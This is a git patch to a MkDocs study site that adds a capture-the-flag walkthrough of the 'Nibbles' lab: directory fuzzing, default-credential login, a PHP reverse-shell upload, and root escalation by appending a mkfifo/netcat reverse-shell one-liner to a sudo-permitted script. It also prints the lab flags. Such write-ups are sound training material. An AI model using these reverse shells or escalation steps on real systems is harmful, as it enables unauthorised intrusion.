From 1b2a7d5a6f7c9d0edb6403c293f4a423d60733fc Mon Sep 17 00:00:00 2001 From: <> Date: Sat, 8 Jun 2024 16:30:45 +0000 Subject: [PATCH] Deployed ac64c069 with MkDocs version: 1.6.0 --- cpts-labs/index.html | 120 +++- img/htb-nibble_00.png | Bin 0 -> 46344 bytes img/htb-nibble_01.png | Bin 0 -> 85057 bytes reverse-shells/index.html | 6 +- search/search_index.json | 2 +- sitemap.xml | 1106 ++++++++++++++++++------------------- sitemap.xml.gz | Bin 4702 -> 4703 bytes 7 files changed, 667 insertions(+), 567 deletions(-) create mode 100644 img/htb-nibble_00.png create mode 100644 img/htb-nibble_01.png diff --git a/cpts-labs/index.html b/cpts-labs/index.html index 29ab99c1c4..5d667a551e 100644 --- a/cpts-labs/index.html +++ b/cpts-labs/index.html @@ -5280,9 +5280,27 @@
  • - + - Nibbles - Web Footprinting + # Nibbles - Initial Foothold + + + +
  • + +
  • + + + Nibbles - Privilege Escalation + + + +
  • + +
  • + + + Knowledge Check @@ -15724,9 +15742,27 @@
  • - + + + # Nibbles - Initial Foothold + + + +
  • + +
  • + - Nibbles - Web Footprinting + Nibbles - Privilege Escalation + + + +
  • + +
  • + + + Knowledge Check @@ -15865,14 +15901,82 @@

    Nibbles - Enumeration

    sudo nmap -sC -sV $ip
     

    Results: 2.4.18

    -

    Nibbles - Web Footprinting

    -
    
    +

    # Nibbles - Initial Foothold

    +

    Gain a foothold on the target and submit the user.txt flag

    +

    Enumerate resources

    +
    ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$ip/nibbleblog/FUZZ -H "HOST: $ip$"
    +
    +dirb http://$ip/nibbleblog/
     
    -

    Results: 2.4.18

    +

    There are a lot of directory listing enabled. And eventually we can browser to: +http://$ip/nibbleblog/content/private/users.xml

    +

    We can identify the user admin.

    +

    admin user

    +

    We could also enumerate http://$ip/nibbleblog/admin.php

    +

    Login access is admin:nibbles.

    +

    Go to Plugins tab and locate MyImage one: http://$ip/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image

    +

    Upload a PHP reverse shell, go to http://$IP/nibbleblog/content/private/plugins/my_image/

    +

    Set a netcat listener

    +
    nc -lnvp 1234
    +
    +

    Click on the reverse shell "image.php" and we will get a reverse shell.

    +
    whoami
    +#nibbler
    +
    +cat /home/nibbler/user.txt
    +
    +

    Results: 79c03865431abf47b90ef24b9695e14879c03865431abf47b90ef24b9695e148

    +

    Nibbles - Privilege Escalation

    +

    Escalate privileges and submit the root.txt flag.

    +
    cd /home/nibbler
    +
    +
    sudo -l
    +
    +

    Results:

    +
    Matching Defaults entries for nibbler on Nibbles:
    +    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
    +
    +User nibbler may run the following commands on Nibbles:
    +    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
    +
    +

    The nibbler user can run the file /home/nibbler/personal/stuff/monitor.sh with root privileges. Being that we have full control over that file, if we append a reverse shell one-liner to the end of it and execute with sudo we should get a reverse shell back as the root user.

    +
    unzip personal.zip
    +strings /home/nibbler/personal/stuff/monitor.sh
    +
    +
    echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $IPattacker 8443 >/tmp/f' | tee -a monitor.sh
    +
    +

    In the attacker machine, open a new netcat:

    +
    nc -lnvp 8443
    +
    +

    Run monitor.sh with sudo

    +
    sudo ./monitor.sh
    +
    +

    In the new netcat connection you are root.

    +
    cat /root/root.txt
    +
    +

    Results: de5e5d6619862a8aa5b9b212314e0cdd

    +

    Alternative way: Metasploit

    +
    exploit/multi/http/nibbleblog_file_upload
    +
    +

    Knowledge Check

    +

    Spawn the target, gain a foothold and submit the contents of the user.txt flag.

    +
    sudo nmap -sC -sV $ip
    +
    +

    Go to http://$ip/robots.txt

    +

    Go to http://$ip/admin

    +

    Enter admin:admin

    +

    Go to Edit Theme: http://$ip/admin/theme-edit.php

    +

    Add a pentesmonkey shell and set a netcat listener on port 1234

    +

    Add gettingstarte.htb to your hosts file

    +

    Open the blog and you will get a reverse shell

    +
    cat /home/mrb3n/user.txt
    +
    +

    Results: 7002d65b149b0a4d19132a66feed21d8

    +

    After obtaining a foothold on the target, escalate privileges to root and submit the contents of the root.txt flag.

    - Last update: 2024-06-07
    + Last update: 2024-06-08
    Created: May 31, 2024 18:03:27 diff --git a/img/htb-nibble_00.png b/img/htb-nibble_00.png new file mode 100644 index 0000000000000000000000000000000000000000..d98314b567a22114e022df981d66991804f49459 GIT binary patch literal 46344 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 